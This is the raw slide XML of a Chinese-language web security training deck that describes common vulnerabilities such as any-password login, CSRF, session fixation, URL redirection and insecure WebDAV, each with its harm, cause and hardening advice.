            <a:endParaRPr lang="zh-CN" alt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647652" y="2132856"/>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934990" y="773907"/>
            <a:ext cx="6624637" cy="6063198"/>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密码</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>明文传输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验证码可绕过或重复使用</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任意密码登录</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其他常见漏洞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跨站点请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</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数据库访问控制</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反编译</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会话标识未更新</a:t>
            </a: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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重定向攻击</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启用不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模块</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批量请求攻击</a:t>
            </a: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任意密码登录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solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    使用任意密码即可登录系统，之后在系统内部进行破坏。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    在登录时，没有对密码进行校验，导致输入任何字符都可登录成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加固</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    对密码进行后台校验</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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730545" y="2996952"/>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1017883" y="773907"/>
            <a:ext cx="6624637" cy="560153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密码</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>明文传输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验证码可绕过或重复使用</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任意密码登录</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其他常见漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>跨站点请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据库访问控制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>会话</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标识未更新</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重定向攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>启用不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>批量请求攻击</a:t>
            </a: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428625" y="1000125"/>
            <a:ext cx="8572500" cy="4308872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin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rPr>
              <a:t>跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(cross-site request forgery)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通常缩写为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>攻击流程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="542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1571625"/>
            <a:ext cx="685800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标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="214313"/>
            <a:ext cx="8291264" cy="550391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>跨站请求伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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428625" y="1143000"/>
            <a:ext cx="8572500" cy="3367076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC3300"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 风险</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>可能会窃取或操纵客户会话和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，它们可能用于模仿合法用户，从而使黑客能够以该用户身份查看或变更用户记录以及执行事务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC3300"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 原因分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>应用程序使用的认证方法不充分</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="214313"/>
            <a:ext cx="7283152" cy="546099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>跨站请求伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300" name="矩形 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195736" y="4365103"/>
            <a:ext cx="4572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诞生于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>年，火于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2007/2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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90%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的网站存在此类漏洞 </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pic>
        <p:nvPicPr>
          <p:cNvPr id="55301" name="Picture 2" descr="C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KELQU8HQ\MC9003463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093" y="4446066"/>
            <a:ext cx="500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7538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
